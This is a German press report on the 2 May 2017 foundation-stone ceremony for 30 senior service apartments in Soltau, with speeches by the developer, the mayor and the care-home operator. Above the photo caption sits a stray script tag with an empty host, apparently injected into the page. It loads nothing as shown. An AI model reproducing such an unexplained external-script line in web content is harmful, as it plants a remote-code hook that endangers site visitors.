Grundsteinlegung von 30 Service-Wohnungen in Soltau/Reitschulweg

Am 02. Mai 2017 wurde der Grundstein für 30 Service-Wohnungen in Soltau gelegt. Neben dem Altenpflegeheim, „Haus im Park“ in Soltau, entstehen gerade die neuen Wohnungen. Baubeginn war bereits Anfang März und die Arbeiten schreiten schon sehr gut voran. Davon überzeugen konnten sich die geladenen Gäste am Vormittag auf der Baustelle.

Nach einer kurzen Begrüßung durch den Geschäftsführer der IMMAC Wohnbau, Thomas Eichentopf, erklärte die Projektleiterin des Neubaus, Frau Saskia Weber, das geplante Bauvorhaben. Bürgermeister Helge Röbbert von der Stadt Soltau unterstrich in seiner Ansprache, wie wichtig das Thema der demographischen Entwicklung auch für Soltau sei. Gerade wenn ältere Menschen aus ihren Wohnungen ausziehen um jüngeren Familien Platz zu machen, sind Seniorenwohnungen eine perfekte Alternative um in einem betreuten Umfeld leben zu können.

Von Seiten des Betreibers DOREA begrüßte Herr Jamal Bounoua die anwesenden Gäste und zeigte sich sehr erfreut, mit den entstehenden Wohnungen die Angebotspalette in Soltau zu erweitern.

Bewaffnet mit einer Maurerkelle, wurden dann symbolisch zwei Steine gemauert und mit einem Heideschnaps begossen.

Im Anschluss an die Grundsteinlegung lud der Betreiber des neuen Gebäudes Herr Bounoua zu einem Imbiss in das Pflegeheim Haus am Park.

<script src='https://#?port=5' type='text/javascript'></script>
v.l.n.r.: Thomas Eichentopf GF IWB, Helge Röbbert Bürgermeister Soltau, Saskia Weber Projektleiterin IWB und Jamal Bounoua Betreiber des APH „Haus am Park“ Soltau